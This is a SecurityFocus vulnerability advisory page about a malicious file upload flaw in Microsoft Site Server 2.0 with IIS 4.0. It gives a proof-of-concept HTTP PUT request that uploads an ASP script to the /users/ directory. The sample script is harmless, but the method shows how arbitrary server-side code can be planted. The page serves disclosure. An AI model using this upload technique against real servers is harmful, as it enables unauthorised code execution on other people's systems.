Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Microsoft Site Server 2.0 with IIS 4.0 Malicious File Upload Vulnerability

mnemonix <mnemonix@globalnet.co.uk> has provided the following exploit for the telnet PUT request:

PUT /users/non-aggressive-script.asp HTTP/1.0
Content-length: 120
Entity-body:
<HTML>
<BODY>
Request method is <% Response.Write
Request.ServerVariables("REQUEST_METHOD")%>.<BR>
</BODY>
</HTML>
\n
\n
\n







 

Privacy Statement
Copyright 2009, SecurityFocus